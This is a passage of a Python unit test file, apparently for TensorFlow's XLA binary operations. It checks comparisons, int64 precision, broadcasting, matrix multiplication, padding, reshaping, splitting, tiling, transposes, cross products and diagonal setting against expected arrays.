        np.array([[10], [7], [2]], dtype=np.float32),
        np.float32(7),
        expected=np.array([[True], [False], [True]], dtype=np.bool))
    # Each ordering op is run via the wrapper and via the Python operator.
    for greater_op in [math_ops.greater, (lambda x, y: x > y)]:
      self._testBinary(
          greater_op,
          np.array([1, 5, 20], dtype=np.float32),
          np.array([10, 5, 2], dtype=np.float32),
          expected=np.array([False, False, True], dtype=np.bool))
      self._testBinary(
          greater_op,
          np.float32(5),
          np.array([1, 5, 20], dtype=np.float32),
          expected=np.array([True, False, False], dtype=np.bool))
      self._testBinary(
          greater_op,
          np.array([[10], [7], [2]], dtype=np.float32),
          np.float32(7),
          expected=np.array([[True], [False], [False]], dtype=np.bool))
    for greater_equal_op in [math_ops.greater_equal, (lambda x, y: x >= y)]:
      self._testBinary(
          greater_equal_op,
          np.array([1, 5, 20], dtype=np.float32),
          np.array([10, 5, 2], dtype=np.float32),
          expected=np.array([False, True, True], dtype=np.bool))
      self._testBinary(
          greater_equal_op,
          np.float32(5),
          np.array([1, 5, 20], dtype=np.float32),
          expected=np.array([True, True, False], dtype=np.bool))
      self._testBinary(
          greater_equal_op,
          np.array([[10], [7], [2]], dtype=np.float32),
          np.float32(7),
          expected=np.array([[True], [True], [False]], dtype=np.bool))
    for less_op in [math_ops.less, (lambda x, y: x < y)]:
      self._testBinary(
          less_op,
          np.array([1, 5, 20], dtype=np.float32),
          np.array([10, 5, 2], dtype=np.float32),
          expected=np.array([True, False, False], dtype=np.bool))
      self._testBinary(
          less_op,
          np.float32(5),
          np.array([1, 5, 20], dtype=np.float32),
          expected=np.array([False, False, True], dtype=np.bool))
      self._testBinary(
          less_op,
          np.array([[10], [7], [2]], dtype=np.float32),
          np.float32(7),
          expected=np.array([[False], [False], [True]], dtype=np.bool))
      # int64 comparison only when the backend supports 64-bit integers.
      if np.int64 in self.numeric_types:
        self._testBinary(
            less_op,
            np.array([[10], [7], [2], [-1]], dtype=np.int64),
            np.int64(7),
            expected=np.array(
                [[False], [False], [True], [True]], dtype=np.bool))
    for less_equal_op in [math_ops.less_equal, (lambda x, y: x <= y)]:
      self._testBinary(
          less_equal_op,
          np.array([1, 5, 20], dtype=np.float32),
          np.array([10, 5, 2], dtype=np.float32),
          expected=np.array([True, True, False], dtype=np.bool))
      self._testBinary(
          less_equal_op,
          np.float32(5),
          np.array([1, 5, 20], dtype=np.float32),
          expected=np.array([False, True, True], dtype=np.bool))
      self._testBinary(
          less_equal_op,
          np.array([[10], [7], [2]], dtype=np.float32),
          np.float32(7),
          expected=np.array([[False], [True], [True]], dtype=np.bool))
  def testS64Comparisons(self):
    """Ordering comparisons on int64 operand pairs.

    The pairs appear chosen to stress full 64-bit precision (many differ
    only in the low-order 32 bits, near signed-32-bit boundaries, or in
    sign) -- a lossy comparison path would get several of them wrong.
    Expected values are computed with Python's exact integer comparison.
    """
    for op in [(lambda x, y: x < y), (lambda x, y: x <= y),
               (lambda x, y: x >= y), (lambda x, y: x > y)]:
      lhs = np.array(
          [
              np.int64(0x000000007FFFFFFF),
              np.int64(0x000000007FFFFFFF),
              np.int64(0x0000000080000000),
              np.int64(0x0000000080000000),
              np.int64(0x0000000080000001),
              np.int64(0x00000000FFFF0000),
              np.int64(0x00000000FFFF0000),
              np.int64(0x00000000FFFFFFFE),
              np.int64(0x00000000FFFFFFFF),
              np.int64(0x00000000FFFFFFFF),
              np.int64(0x0000000100000000),
              np.int64(0x0000000200000002),
              np.int64(0x0000000200000002),
              np.int64(0x0000000200000002),
              np.int64(0x0000000200000002),
              np.int64(0x0000000200000002),
              np.int64(0x0000000200000002),
              np.int64(0x0000000200000002),
              np.int64(0x0000000200000002),
              np.int64(0x0000000200000002),
              np.int64(-0x7FFFFFFF00000002),
              np.int64(-0x7FFFFFFF00000002),
              np.int64(-0x7FFFFFFF00000001),
              np.int64(-0x7FFFFFFF00000001),
              np.int64(-0x7FFFFFFF00000001),
              np.int64(-0x7FFFFFFF00000001),
              np.int64(0x7ffffffefff00010),
              np.int64(0x7ffffffefff00010),
              np.int64(-1),
              np.int64(-1)
          ],
          dtype=np.int64)
      rhs = np.array(
          [
              np.int64(0x000000007FFFFFFE),
              np.int64(0x000000007FFFFFFF),
              np.int64(0x000000007FFFFFFF),
              np.int64(0x0000000080000000),
              np.int64(0x0000000080000001),
              np.int64(0x00000000FFFF0000),
              np.int64(0x00000000FFFF0001),
              np.int64(0x00000000FFFFFFFF),
              np.int64(0x00000000FFFFFFFE),
              np.int64(0x00000000FFFFFFFF),
              np.int64(0x00000000FFFFFFFF),
              np.int64(0x0000000100000001),
              np.int64(0x0000000100000002),
              np.int64(0x0000000100000003),
              np.int64(0x0000000200000001),
              np.int64(0x0000000200000002),
              np.int64(0x0000000200000003),
              np.int64(0x0000000300000001),
              np.int64(0x0000000300000002),
              np.int64(0x0000000300000003),
              np.int64(0x00000000FFFFFFFF),
              np.int64(-0x7FFFFFFF00000001),
              np.int64(0x00000000FFFFFFFE),
              np.int64(0x00000000FFFFFFFF),
              np.int64(-0x7FFFFFFF00000002),
              np.int64(-0x7FFFFFFF00000001),
              np.int64(0x00000000FFFFFFFF),
              np.int64(-0x7FFFFFFF00000001),
              np.int64(-2),
              np.int64(-1)
          ],
          dtype=np.int64)
      # Ground truth from elementwise Python int comparison.
      expected = np.array([op(l, r) for l, r in zip(lhs, rhs)], dtype=np.bool)
      self._testBinary(op, lhs, rhs, expected=expected)
  def testBroadcasting(self):
    """Tests broadcasting behavior of an operator.

    Uses math_ops.add to cover scalar-vs-vector broadcasts in both
    argument orders, plus two rank-expanding outer-sum shapes.
    """
    for dtype in self.numeric_types:
      # scalar + [2] => [2]
      self._testBinary(
          math_ops.add,
          np.array(3, dtype=dtype),
          np.array([10, 20], dtype=dtype),
          expected=np.array([13, 23], dtype=dtype))
      # [2] + scalar => [2]
      self._testBinary(
          math_ops.add,
          np.array([10, 20], dtype=dtype),
          np.array(4, dtype=dtype),
          expected=np.array([14, 24], dtype=dtype))
      # [1,3] x [4,1] => [4,3]
      self._testBinary(
          math_ops.add,
          np.array([[10, 20, 30]], dtype=dtype),
          np.array([[1], [2], [3], [4]], dtype=dtype),
          expected=np.array(
              [[11, 21, 31], [12, 22, 32], [13, 23, 33], [14, 24, 34]],
              dtype=dtype))
      # [3] * [4,1] => [4,3]
      self._testBinary(
          math_ops.add,
          np.array([10, 20, 30], dtype=dtype),
          np.array([[1], [2], [3], [4]], dtype=dtype),
          expected=np.array(
              [[11, 21, 31], [12, 22, 32], [13, 23, 33], [14, 24, 34]],
              dtype=dtype))
  def testFill(self):
    """Checks array_ops.fill for scalar (empty-shape), 1x2, and 3x2 outputs."""
    for dtype in self.numeric_types:
      # An empty dims vector yields a scalar fill.
      self._testBinary(
          array_ops.fill,
          np.array([], dtype=np.int32),
          dtype(-42),
          expected=dtype(-42))
      self._testBinary(
          array_ops.fill,
          np.array([1, 2], dtype=np.int32),
          dtype(7),
          expected=np.array([[7, 7]], dtype=dtype))
      self._testBinary(
          array_ops.fill,
          np.array([3, 2], dtype=np.int32),
          dtype(50),
          expected=np.array([[50, 50], [50, 50], [50, 50]], dtype=dtype))
  # Helper method used by testMatMul, testSparseMatMul, testBatchMatMul below.
  def _testMatMul(self, op):
    """Shared 2-D matrix-multiplication cases.

    Args:
      op: a binary callable with matmul semantics (e.g. math_ops.matmul
        or a sparse_matmul wrapper).
    """
    for dtype in self.float_types:
      # [1,1] x [1,1]
      self._testBinary(
          op,
          np.array([[-0.25]], dtype=dtype),
          np.array([[8]], dtype=dtype),
          expected=np.array([[-2]], dtype=dtype))
      # [1,3] x [3,2]
      self._testBinary(
          op,
          np.array([[100, 10, 0.5]], dtype=dtype),
          np.array([[1, 3], [2, 5], [6, 8]], dtype=dtype),
          expected=np.array([[123, 354]], dtype=dtype))
      # [3,2] x [2,1]
      self._testBinary(
          op,
          np.array([[1, 3], [2, 5], [6, 8]], dtype=dtype),
          np.array([[100], [10]], dtype=dtype),
          expected=np.array([[130], [250], [680]], dtype=dtype))
      # [2,2] x [2,2]
      self._testBinary(
          op,
          np.array([[1000, 100], [10, 1]], dtype=dtype),
          np.array([[1, 2], [3, 4]], dtype=dtype),
          expected=np.array([[1300, 2400], [13, 24]], dtype=dtype))
      # Degenerate inner dimension: [2,0] x [0,3] => zeros of shape [2,3].
      self._testBinary(
          op,
          np.array([], dtype=dtype).reshape((2, 0)),
          np.array([], dtype=dtype).reshape((0, 3)),
          expected=np.array([[0, 0, 0], [0, 0, 0]], dtype=dtype))
def testMatMul(self):
self._testMatMul(math_ops.matmul)
  # TODO(phawkins): failing on GPU, no registered kernel.
  def DISABLED_testSparseMatMul(self):
    """Runs the matmul cases through sparse_matmul with every hint combo."""

    # Binary wrappers for sparse_matmul with different hints
    def SparseMatmulWrapperTF(a, b):
      # Hint: left operand is sparse.
      return math_ops.sparse_matmul(a, b, a_is_sparse=True)

    def SparseMatmulWrapperFT(a, b):
      # Hint: right operand is sparse.
      return math_ops.sparse_matmul(a, b, b_is_sparse=True)

    def SparseMatmulWrapperTT(a, b):
      # Hint: both operands are sparse.
      return math_ops.sparse_matmul(a, b, a_is_sparse=True, b_is_sparse=True)

    self._testMatMul(math_ops.sparse_matmul)
    self._testMatMul(SparseMatmulWrapperTF)
    self._testMatMul(SparseMatmulWrapperFT)
    self._testMatMul(SparseMatmulWrapperTT)
  def testBatchMatMul(self):
    """Checks batched matmul: 2-D base cases plus batch dimensions.

    Includes zero-size batch/contraction dimensions and an adjoint_b
    regression case for b/31472796.
    """
    # Same tests as for tf.matmul above.
    self._testMatMul(math_ops.matmul)

    # Tests with batches of matrices.
    self._testBinary(
        math_ops.matmul,
        np.array([[[-0.25]]], dtype=np.float32),
        np.array([[[8]]], dtype=np.float32),
        expected=np.array([[[-2]]], dtype=np.float32))
    self._testBinary(
        math_ops.matmul,
        np.array([[[-0.25]], [[4]]], dtype=np.float32),
        np.array([[[8]], [[2]]], dtype=np.float32),
        expected=np.array([[[-2]], [[8]]], dtype=np.float32))
    # [2,2] batch of [2,2] x [2,2] products.
    self._testBinary(
        math_ops.matmul,
        np.array(
            [[[[7, 13], [10, 1]], [[2, 0.25], [20, 2]]],
             [[[3, 5], [30, 3]], [[0.75, 1], [40, 4]]]],
            dtype=np.float32),
        np.array(
            [[[[1, 2], [3, 4]], [[5, 6], [7, 8]]], [[[11, 22], [33, 44]],
                                                    [[55, 66], [77, 88]]]],
            dtype=np.float32),
        expected=np.array(
            [[[[46, 66], [13, 24]], [[11.75, 14], [114, 136]]],
             [[[198, 286], [429, 792]], [[118.25, 137.5], [2508, 2992]]]],
            dtype=np.float32))
    # Zero-size contraction dimension: result is all zeros.
    self._testBinary(
        math_ops.matmul,
        np.array([], dtype=np.float32).reshape((2, 2, 0)),
        np.array([], dtype=np.float32).reshape((2, 0, 3)),
        expected=np.array(
            [[[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]]],
            dtype=np.float32))
    # Zero-size batch dimension: result is empty.
    self._testBinary(
        math_ops.matmul,
        np.array([], dtype=np.float32).reshape((0, 2, 4)),
        np.array([], dtype=np.float32).reshape((0, 4, 3)),
        expected=np.array([], dtype=np.float32).reshape(0, 2, 3))

    # Regression test for b/31472796.
    if hasattr(np, "matmul"):
      x = np.arange(0, 3 * 5 * 2 * 7, dtype=np.float32).reshape((3, 5, 2, 7))
      self._testBinary(
          lambda x, y: math_ops.matmul(x, y, adjoint_b=True),
          x, x,
          expected=np.matmul(x, x.transpose([0, 1, 3, 2])))
  def testExpandDims(self):
    """Checks expand_dims inserting a size-1 axis at positions 0 through 3."""
    for dtype in self.numeric_types:
      # Scalar input: expanding axis 0 yields a 1-element vector.
      self._testBinary(
          array_ops.expand_dims,
          dtype(7),
          np.int32(0),
          expected=np.array([7], dtype=dtype))
      self._testBinary(
          array_ops.expand_dims,
          np.array([42], dtype=dtype),
          np.int32(0),
          expected=np.array([[42]], dtype=dtype))
      # Empty input keeps its zero-size dimension.
      self._testBinary(
          array_ops.expand_dims,
          np.array([], dtype=dtype),
          np.int32(0),
          expected=np.array([[]], dtype=dtype))
      # Rank-3 input, axis swept over every legal insertion point.
      self._testBinary(
          array_ops.expand_dims,
          np.array([[[1, 2], [3, 4]]], dtype=dtype),
          np.int32(0),
          expected=np.array([[[[1, 2], [3, 4]]]], dtype=dtype))
      self._testBinary(
          array_ops.expand_dims,
          np.array([[[1, 2], [3, 4]]], dtype=dtype),
          np.int32(1),
          expected=np.array([[[[1, 2], [3, 4]]]], dtype=dtype))
      self._testBinary(
          array_ops.expand_dims,
          np.array([[[1, 2], [3, 4]]], dtype=dtype),
          np.int32(2),
          expected=np.array([[[[1, 2]], [[3, 4]]]], dtype=dtype))
      self._testBinary(
          array_ops.expand_dims,
          np.array([[[1, 2], [3, 4]]], dtype=dtype),
          np.int32(3),
          expected=np.array([[[[1], [2]], [[3], [4]]]], dtype=dtype))
  def testPad(self):
    """Checks array_ops.pad with default (zero) and custom constant values."""
    for dtype in self.numeric_types:
      # Default padding constant is 0.
      self._testBinary(
          array_ops.pad,
          np.array(
              [[1, 2, 3], [4, 5, 6]], dtype=dtype),
          np.array(
              [[1, 2], [2, 1]], dtype=np.int32),
          expected=np.array(
              [[0, 0, 0, 0, 0, 0],
               [0, 0, 1, 2, 3, 0],
               [0, 0, 4, 5, 6, 0],
               [0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0]],
              dtype=dtype))
      # Explicit constant_values=7.
      self._testBinary(
          lambda x, y: array_ops.pad(x, y, constant_values=7),
          np.array(
              [[1, 2, 3], [4, 5, 6]], dtype=dtype),
          np.array(
              [[0, 3], [2, 1]], dtype=np.int32),
          expected=np.array(
              [[7, 7, 1, 2, 3, 7],
               [7, 7, 4, 5, 6, 7],
               [7, 7, 7, 7, 7, 7],
               [7, 7, 7, 7, 7, 7],
               [7, 7, 7, 7, 7, 7]],
              dtype=dtype))
  def testSymmetricMirrorPad(self):
    """Checks SYMMETRIC mirror padding (edge values are repeated)."""
    mirror_pad = lambda t, paddings: array_ops.pad(t, paddings, "SYMMETRIC")
    for dtype in self.numeric_types:
      # Paddings larger than the input dimensions are legal in SYMMETRIC
      # mode, so the reflection wraps around more than once.
      self._testBinary(
          mirror_pad,
          np.array(
              [
                  [1, 2, 3],  #
                  [4, 5, 6],  #
              ],
              dtype=dtype),
          np.array([[
              2,
              2,
          ], [3, 3]], dtype=np.int32),
          expected=np.array(
              [
                  [6, 5, 4, 4, 5, 6, 6, 5, 4],  #
                  [3, 2, 1, 1, 2, 3, 3, 2, 1],  #
                  [3, 2, 1, 1, 2, 3, 3, 2, 1],  #
                  [6, 5, 4, 4, 5, 6, 6, 5, 4],  #
                  [6, 5, 4, 4, 5, 6, 6, 5, 4],  #
                  [3, 2, 1, 1, 2, 3, 3, 2, 1],  #
              ],
              dtype=dtype))
      # Zero paddings: identity.
      self._testBinary(
          mirror_pad,
          np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype),
          np.array([[0, 0], [0, 0]], dtype=np.int32),
          expected=np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype))
  def testReflectMirrorPad(self):
    """Checks REFLECT mirror padding (edge values are not repeated)."""
    mirror_pad = lambda t, paddings: array_ops.pad(t, paddings, "REFLECT")
    for dtype in self.numeric_types:
      self._testBinary(
          mirror_pad,
          np.array(
              [
                  [1, 2, 3],  #
                  [4, 5, 6],  #
              ],
              dtype=dtype),
          np.array([[
              1,
              1,
          ], [2, 2]], dtype=np.int32),
          expected=np.array(
              [
                  [6, 5, 4, 5, 6, 5, 4],  #
                  [3, 2, 1, 2, 3, 2, 1],  #
                  [6, 5, 4, 5, 6, 5, 4],  #
                  [3, 2, 1, 2, 3, 2, 1]
              ],
              dtype=dtype))
      # Zero paddings: identity.
      self._testBinary(
          mirror_pad,
          np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype),
          np.array([[0, 0], [0, 0]], dtype=np.int32),
          expected=np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype))
      # Padding only the leading dimension.
      self._testBinary(
          mirror_pad,
          np.array(
              [
                  [1, 2, 3],  #
                  [4, 5, 6],  #
                  [7, 8, 9]
              ],
              dtype=dtype),
          np.array([[2, 2], [0, 0]], dtype=np.int32),
          expected=np.array(
              [
                  [7, 8, 9],  #
                  [4, 5, 6],  #
                  [1, 2, 3],  #
                  [4, 5, 6],  #
                  [7, 8, 9],  #
                  [4, 5, 6],  #
                  [1, 2, 3]
              ],
              dtype=dtype))
      # Rank-3 input padded on the two trailing dimensions.
      self._testBinary(
          mirror_pad,
          np.array(
              [
                  [[1, 2, 3], [4, 5, 6]],
                  [[7, 8, 9], [10, 11, 12]],
              ], dtype=dtype),
          np.array([[0, 0], [1, 1], [1, 1]], dtype=np.int32),
          expected=np.array(
              [
                  [
                      [5, 4, 5, 6, 5],  #
                      [2, 1, 2, 3, 2],  #
                      [5, 4, 5, 6, 5],  #
                      [2, 1, 2, 3, 2],  #
                  ],
                  [
                      [11, 10, 11, 12, 11],  #
                      [8, 7, 8, 9, 8],  #
                      [11, 10, 11, 12, 11],  #
                      [8, 7, 8, 9, 8],  #
                  ]
              ],
              dtype=dtype))
  def testReshape(self):
    """Checks reshape with explicit shapes and a -1 wildcard dimension."""
    for dtype in self.numeric_types:
      # Empty tensor reshaped to a zero-size 2-D shape.
      self._testBinary(
          array_ops.reshape,
          np.array([], dtype=dtype),
          np.array([0, 4], dtype=np.int32),
          expected=np.zeros(shape=[0, 4], dtype=dtype))
      self._testBinary(
          array_ops.reshape,
          np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
          np.array([2, 3], dtype=np.int32),
          expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
      self._testBinary(
          array_ops.reshape,
          np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
          np.array([3, 2], dtype=np.int32),
          expected=np.array([[0, 1], [2, 3], [4, 5]], dtype=dtype))
      # -1 lets reshape infer the remaining dimension in either position.
      self._testBinary(
          array_ops.reshape,
          np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
          np.array([-1, 6], dtype=np.int32),
          expected=np.array([[0, 1, 2, 3, 4, 5]], dtype=dtype))
      self._testBinary(
          array_ops.reshape,
          np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
          np.array([6, -1], dtype=np.int32),
          expected=np.array([[0], [1], [2], [3], [4], [5]], dtype=dtype))
      self._testBinary(
          array_ops.reshape,
          np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
          np.array([2, -1], dtype=np.int32),
          expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
      self._testBinary(
          array_ops.reshape,
          np.array([0, 1, 2, 3, 4, 5], dtype=dtype),
          np.array([-1, 3], dtype=np.int32),
          expected=np.array([[0, 1, 2], [3, 4, 5]], dtype=dtype))
  def testSplit(self):
    """Checks equal-sized and size-list splits along positive and negative axes.

    The axis is passed as the first _testBinary operand (an int32 scalar)
    and forwarded into array_ops.split via a lambda.
    """
    for dtype in self.numeric_types:
      # Split a [3,2,1] tensor into 3 pieces along axis 0 (also as -3).
      for axis in [0, -3]:
        self._testBinary(
            lambda x, y: array_ops.split(value=y, num_or_size_splits=3, axis=x),
            np.int32(axis),
            np.array([[[1], [2]], [[3], [4]], [[5], [6]]],
                     dtype=dtype),
            expected=[
                np.array([[[1], [2]]], dtype=dtype),
                np.array([[[3], [4]]], dtype=dtype),
                np.array([[[5], [6]]], dtype=dtype),
            ],
            equality_test=self.ListsAreClose)

      # Split into 2 pieces along axis 1 (also as -2).
      for axis in [1, -2]:
        self._testBinary(
            lambda x, y: array_ops.split(value=y, num_or_size_splits=2, axis=x),
            np.int32(axis),
            np.array([[[1], [2]], [[3], [4]], [[5], [6]]],
                     dtype=dtype),
            expected=[
                np.array([[[1]], [[3]], [[5]]], dtype=dtype),
                np.array([[[2]], [[4]], [[6]]], dtype=dtype),
            ],
            equality_test=self.ListsAreClose)

      # split_v: explicit size list [2, 3] along the last axis.
      def splitvOp(x, y):  # pylint: disable=invalid-name
        return array_ops.split(value=y, num_or_size_splits=[2, 3], axis=x)

      for axis in [1, -1]:
        self._testBinary(
            splitvOp,
            np.int32(axis),
            np.array([[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]],
                     dtype=dtype),
            expected=[
                np.array([[0, 1], [5, 6]], dtype=dtype),
                np.array([[2, 3, 4], [7, 8, 9]], dtype=dtype),
            ],
            equality_test=self.ListsAreClose)
  def testTile(self):
    """Checks array_ops.tile, including zero multiples and identity tiling."""
    for dtype in self.numeric_types:
      # A zero multiple collapses that dimension to size 0.
      self._testBinary(
          array_ops.tile,
          np.array([[6], [3], [4]], dtype=dtype),
          np.array([2, 0], dtype=np.int32),
          expected=np.empty([6, 0], dtype=dtype))
      self._testBinary(
          array_ops.tile,
          np.array([[6, 3, 4]], dtype=dtype),
          np.array([2, 0], dtype=np.int32),
          expected=np.empty([2, 0], dtype=dtype))
      self._testBinary(
          array_ops.tile,
          np.array([[6]], dtype=dtype),
          np.array([1, 2], dtype=np.int32),
          expected=np.array([[6, 6]], dtype=dtype))
      self._testBinary(
          array_ops.tile,
          np.array([[1], [2]], dtype=dtype),
          np.array([1, 2], dtype=np.int32),
          expected=np.array([[1, 1], [2, 2]], dtype=dtype))
      self._testBinary(
          array_ops.tile,
          np.array([[1, 2], [3, 4]], dtype=dtype),
          np.array([3, 2], dtype=np.int32),
          expected=np.array(
              [[1, 2, 1, 2],
               [3, 4, 3, 4],
               [1, 2, 1, 2],
               [3, 4, 3, 4],
               [1, 2, 1, 2],
               [3, 4, 3, 4]],
              dtype=dtype))
      # All-ones multiples: identity.
      self._testBinary(
          array_ops.tile,
          np.array([[1, 2], [3, 4]], dtype=dtype),
          np.array([1, 1], dtype=np.int32),
          expected=np.array(
              [[1, 2],
               [3, 4]],
              dtype=dtype))
      self._testBinary(
          array_ops.tile,
          np.array([[1, 2]], dtype=dtype),
          np.array([3, 1], dtype=np.int32),
          expected=np.array(
              [[1, 2],
               [1, 2],
               [1, 2]],
              dtype=dtype))
  def testTranspose(self):
    """Checks transpose with a rank-3 permutation, identity, and a swap."""
    for dtype in self.numeric_types:
      # Permuting a zero-size dimension.
      self._testBinary(
          array_ops.transpose,
          np.zeros(shape=[1, 0, 4], dtype=dtype),
          np.array([1, 2, 0], dtype=np.int32),
          expected=np.zeros(shape=[0, 4, 1], dtype=dtype))
      # Identity permutation.
      self._testBinary(
          array_ops.transpose,
          np.array([[1, 2], [3, 4]], dtype=dtype),
          np.array([0, 1], dtype=np.int32),
          expected=np.array([[1, 2], [3, 4]], dtype=dtype))
      # Standard 2-D transpose.
      self._testBinary(
          array_ops.transpose,
          np.array([[1, 2], [3, 4]], dtype=dtype),
          np.array([1, 0], dtype=np.int32),
          expected=np.array([[1, 3], [2, 4]], dtype=dtype))
  def testConjugateTranspose(self):
    """Checks conjugate_transpose: permutes axes and conjugates each element."""
    for dtype in self.complex_types:
      self._testBinary(
          array_ops.conjugate_transpose,
          np.zeros(shape=[1, 0, 4], dtype=dtype),
          np.array([1, 2, 0], dtype=np.int32),
          expected=np.zeros(shape=[0, 4, 1], dtype=dtype))
      # Identity permutation still conjugates the values.
      self._testBinary(
          array_ops.conjugate_transpose,
          np.array([[1 - 1j, 2 + 2j], [3 - 3j, 4 + 4j]], dtype=dtype),
          np.array([0, 1], dtype=np.int32),
          expected=np.array([[1 + 1j, 2 - 2j], [3 + 3j, 4 - 4j]], dtype=dtype))
      # Swap permutation: conjugate of the matrix transpose.
      self._testBinary(
          array_ops.conjugate_transpose,
          np.array([[1 - 1j, 2 + 2j], [3 - 3j, 4 + 4j]], dtype=dtype),
          np.array([1, 0], dtype=np.int32),
          expected=np.array([[1 + 1j, 3 + 3j], [2 - 2j, 4 - 4j]], dtype=dtype))
  def testCross(self):
    """Checks the 3-D cross product on zero, vector, and batched inputs."""
    for dtype in self.float_types:
      self._testBinary(
          gen_math_ops.cross,
          np.zeros((4, 3), dtype=dtype),
          np.zeros((4, 3), dtype=dtype),
          expected=np.zeros((4, 3), dtype=dtype))
      # [1,2,3] x [4,5,6] == [-3, 6, -3].
      self._testBinary(
          gen_math_ops.cross,
          np.array([1, 2, 3], dtype=dtype),
          np.array([4, 5, 6], dtype=dtype),
          expected=np.array([-3, 6, -3], dtype=dtype))
      # Batched: cross product is applied row-wise.
      self._testBinary(
          gen_math_ops.cross,
          np.array([[1, 2, 3], [10, 11, 12]], dtype=dtype),
          np.array([[4, 5, 6], [40, 50, 60]], dtype=dtype),
          expected=np.array([[-3, 6, -3], [60, -120, 60]], dtype=dtype))
  def testBroadcastArgs(self):
    """Checks broadcast_dynamic_shape on compatible and incompatible shapes.

    Every compatible pair is tested in both argument orders; the final
    case asserts that genuinely incompatible shapes raise
    InvalidArgumentError.
    """
    self._testBinary(array_ops.broadcast_dynamic_shape,
                     np.array([2, 3, 5], dtype=np.int32),
                     np.array([1], dtype=np.int32),
                     expected=np.array([2, 3, 5], dtype=np.int32))
    self._testBinary(array_ops.broadcast_dynamic_shape,
                     np.array([1], dtype=np.int32),
                     np.array([2, 3, 5], dtype=np.int32),
                     expected=np.array([2, 3, 5], dtype=np.int32))
    self._testBinary(array_ops.broadcast_dynamic_shape,
                     np.array([2, 3, 5], dtype=np.int32),
                     np.array([5], dtype=np.int32),
                     expected=np.array([2, 3, 5], dtype=np.int32))
    self._testBinary(array_ops.broadcast_dynamic_shape,
                     np.array([5], dtype=np.int32),
                     np.array([2, 3, 5], dtype=np.int32),
                     expected=np.array([2, 3, 5], dtype=np.int32))
    self._testBinary(array_ops.broadcast_dynamic_shape,
                     np.array([2, 3, 5], dtype=np.int32),
                     np.array([3, 5], dtype=np.int32),
                     expected=np.array([2, 3, 5], dtype=np.int32))
    self._testBinary(array_ops.broadcast_dynamic_shape,
                     np.array([3, 5], dtype=np.int32),
                     np.array([2, 3, 5], dtype=np.int32),
                     expected=np.array([2, 3, 5], dtype=np.int32))
    self._testBinary(array_ops.broadcast_dynamic_shape,
                     np.array([2, 3, 5], dtype=np.int32),
                     np.array([3, 1], dtype=np.int32),
                     expected=np.array([2, 3, 5], dtype=np.int32))
    self._testBinary(array_ops.broadcast_dynamic_shape,
                     np.array([3, 1], dtype=np.int32),
                     np.array([2, 3, 5], dtype=np.int32),
                     expected=np.array([2, 3, 5], dtype=np.int32))
    self._testBinary(array_ops.broadcast_dynamic_shape,
                     np.array([2, 1, 5], dtype=np.int32),
                     np.array([3, 1], dtype=np.int32),
                     expected=np.array([2, 3, 5], dtype=np.int32))
    self._testBinary(array_ops.broadcast_dynamic_shape,
                     np.array([3, 1], dtype=np.int32),
                     np.array([2, 1, 5], dtype=np.int32),
                     expected=np.array([2, 3, 5], dtype=np.int32))
    # Incompatible trailing dimensions must be rejected.
    with self.assertRaisesWithPredicateMatch(errors.InvalidArgumentError,
                                             "Incompatible shapes"):
      self._testBinary(array_ops.broadcast_dynamic_shape,
                       np.array([1, 2, 3], dtype=np.int32),
                       np.array([4, 5, 6], dtype=np.int32),
                       expected=None)
  def testMatrixSetDiag(self):
    """Checks matrix_set_diag on square, batched, and rectangular inputs."""
    for dtype in self.numeric_types:
      # Square
      self._testBinary(
          array_ops.matrix_set_diag,
          np.array([[0.0, 1.0, 0.0], [1.0, 0.0, 1.0], [1.0, 1.0, 1.0]],
                   dtype=dtype),
          np.array([1.0, 2.0, 3.0], dtype=dtype),
          expected=np.array([[1.0, 1.0, 0.0], [1.0, 2.0, 1.0], [1.0, 1.0, 3.0]],
                            dtype=dtype))

      # Batched square: one diagonal vector per batch element.
      self._testBinary(
          array_ops.matrix_set_diag,
          np.array([[[1.0, 0.0, 3.0], [0.0, 2.0, 0.0], [1.0, 0.0, 3.0]],
                    [[4.0, 0.0, 4.0], [0.0, 5.0, 0.0], [2.0, 0.0, 6.0]]],
                   dtype=dtype),
          np.array([[-1.0, 0.0, -3.0], [-4.0, -5.0, -6.0]], dtype=dtype),
          expected=np.array(
              [[[-1.0, 0.0, 3.0], [0.0, 0.0, 0.0], [1.0, 0.0, -3.0]],
               [[-4.0, 0.0, 4.0], [0.0, -5.0, 0.0], [2.0, 0.0, -6.0]]],
              dtype=dtype))

      # Rectangular
      self._testBinary(
          array_ops.matrix_set_diag,
          np.array([[0.0, 1.0, 0.0], [1.0, 0.0, 1.0]], dtype=dtype),
          np.array([3.0, 4.0], dtype=dtype),
          expected=np.array([[3.0, 1.0, 0.0], [1.0, 4.0, 1.0]], dtype=dtype))

      self._testBinary(
          array_ops.matrix_set_diag,
          np.array([[0.0, 1.0], [1.0, 0.0], [1.0, 1.0]], dtype=dtype),
          np.array([3.0, 4.0], dtype=dtype),
          expected=np.array([[3.0, 1.0], [1.0, 4.0], [1.0, 1.0]], dtype=dtype))

      # Batched rectangular.
      self._testBinary(
          array_ops.matrix_set_diag,
          np.array([[[1.0, 0.0, 3.0], [0.0, 2.0, 0.0]],
                    [[4.0, 0.0, 4.0], [0.0, 5.0, 0.0]]], dtype=dtype),
          np.array([[-1.0, -2.0], [-4.0, -5.0]],
                   dtype=dtype),
          expected=np.array([[[-1.0, 0.0, 3.0], [0.0, -2.0, 0.0]],
                             [[-4.0, 0.0, 4.0], [0.0, -5.0, 0.0]]],
                            dtype=dtype))
  def testBroadcastTo(self):
    """Checks broadcast_to against equivalent np.tile expansions.

    NOTE(review): `x` is plain np.random.randint output and is never
    cast to the loop `dtype`, so the first five cases always run with
    numpy's default integer dtype -- confirm whether an `.astype(dtype)`
    was intended.
    """
    for dtype in self.all_types:
      x = np.random.randint(0, high=100, size=[2, 3])
      # Broadcasting to the same shape is the identity.
      self._testBinary(
          array_ops.broadcast_to,
          x,
          np.array([2, 3], dtype=np.int32),
